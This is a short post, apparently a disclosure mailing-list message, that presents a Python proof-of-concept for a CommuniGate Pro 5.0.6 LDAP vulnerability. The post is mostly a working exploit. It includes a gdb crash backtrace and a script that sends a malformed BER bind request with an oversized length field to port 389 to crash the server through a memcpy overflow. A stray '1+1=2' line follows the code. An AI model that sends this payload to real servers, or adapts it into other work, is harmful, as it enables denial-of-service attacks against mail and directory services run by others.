com506.py.txt

`Hi all,  
  
The simple code below can be used to reproduce one of CommuniGate 5.0.6 LDAP vulnerabilities   
(http://www.gleg.net/cg_advisory.txt)  
  
#!/usr/bin/env python  
# Use this code at your own risk.  
# It may crash your server!  
# Author: Evgeny Legerov  
  
import sys  
import socket  
  
HELP="""  
CommuniGate Pro 5.0.6 vulnerability.  
Found with ProtoVer LDAP testsuite v1.1  
  
Program received signal SIGSEGV, Segmentation fault.  
[Switching to Thread -1389495376 (LWP 20235)]  
0xada99bbc in memcpy () from /lib/libc.so.6  
(gdb) backtrace  
#0 0xada99bbc in memcpy () from /lib/libc.so.6  
#1 0x083924b8 in STCopyCString ()  
#2 0x08349d5b in BERPackedData::makeCString ()  
#3 0x081ae71a in VLDAPInput::processBINDrequest ()  
#4 0x081af747 in VLDAPInput::processInput ()  
#5 0x082c9373 in VStream::worker ()  
#6 0x082ca1e9 in VStream::starter ()  
#7 0x08399e7d in STThreadStarter ()  
#8 0xadb8bb80 in start_thread () from /lib/libpthread.so.0  
#9 0xadaf8dee in clone () from /lib/libc.so.6  
(gdb) x/i $eip  
0xada99bbc <memcpy+28>: repz movsl %ds:(%esi),%es:(%edi)  
(gdb) info regi esi edi ecx  
esi 0x8688961 141068641  
edi 0x86c6fff 141324287  
ecx 0x3fff7eae 1073708718  
"""  
  
print HELP  
  
host="localhost"  
port=389  
  
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.connect((host,port))  
  
s = "\x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80"  
s += "\x84\xff\xff\xff\xff"  
  
sock.sendall(s)  
sock.close()  
1+1=2  
  
Best regards,  
Evgeny Legerov  
`